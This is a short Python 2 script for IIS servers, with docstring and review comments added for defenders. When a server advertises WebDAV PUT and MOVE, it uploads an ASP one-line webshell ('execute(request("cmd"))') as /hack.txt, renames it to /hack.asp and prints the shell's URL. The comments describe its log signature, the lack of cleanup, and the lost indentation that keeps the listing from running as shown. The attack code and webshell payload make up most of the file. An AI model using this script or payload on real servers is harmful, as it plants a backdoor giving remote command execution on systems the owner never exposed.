IIS_Put_File.py
#-*- encoding:utf-8 -*-
'''
IIS put file From http://www.lijiejie.com

Sends OPTIONS / to the given host, reads the Server and Public response
headers and, when Public lists both PUT and MOVE, writes /hack.txt to the
web root and renames it to /hack.asp.

This is not a read-only check: on a server that accepts the writes it leaves
/hack.txt or /hack.asp behind and does no cleanup.

Notes for defenders:
- The requests carry no credentials, so the condition exercised is a web
  root that accepts PUT and MOVE from anonymous clients (presumably WebDAV
  with write permission enabled -- confirm against the server's config).
- In the web server log the sequence from one client is OPTIONS /,
  PUT /hack.txt, MOVE /hack.txt with Destination /hack.asp.
- "Server not vulnerable" only means the Public header did not advertise
  both methods; it is not evidence that writes are actually refused.

Python 2 only (httplib, print statement, "except Exception,e").

Usage:
iisPUT.py www.example.com:8080
'''
import httplib
import sys
# NOTE(review): indentation was lost where this listing was extracted; the
# statements below are flush-left and will not run as shown.
try:
# sys.argv[1] is host[:port]; plain HTTP only (HTTPConnection, no TLS).
conn = httplib.HTTPConnection(sys.argv[1])
conn.request(method='OPTIONS', url='/')
# Python 2 httplib returns header names lowercased, hence 'server'/'public'.
headers = dict(conn.getresponse().getheaders())
# Banner check. NOTE(review): the trailing else can only pair with the
# PUT/MOVE test below, so this message appears to be advisory only and the
# script continues on non-IIS servers -- confirm against the upstream file.
if headers.get('server', '').find('Microsoft-IIS') < 0:
print 'This is not an IIS web server'
# Decision is based solely on what the Public header advertises. The "> 0"
# comparisons mean a method name at offset 0 of the value is not counted.
if 'public' in headers and \
headers['public'].find('PUT') > 0 and \
headers['public'].find('MOVE') > 0:
conn.close()
conn = httplib.HTTPConnection(sys.argv[1])
# Write step: PUT /hack.txt with an ASP snippet as the body. The response is
# never read, so the status code of the PUT is not checked.
conn.request( method='PUT', url='/hack.txt', body='<%execute(request("cmd"))%>' )
conn.close()
conn = httplib.HTTPConnection(sys.argv[1])
# Rename step: MOVE /hack.txt to /hack.asp so the server treats it as a
# script. Again the response is not read and this connection is not closed.
conn.request(method='MOVE', url='/hack.txt', headers={'Destination': '/hack.asp'})
# Printed unconditionally after the two requests; it does not confirm that
# either request succeeded -- verify on the server side.
print 'ASP webshell:', 'http://' + sys.argv[1] + '/hack.asp'
else:
print 'Server not vulnerable'
# Catch-all: a missing argument (IndexError) and network errors are both
# reported through the same message.
except Exception,e:
print 'Error:', e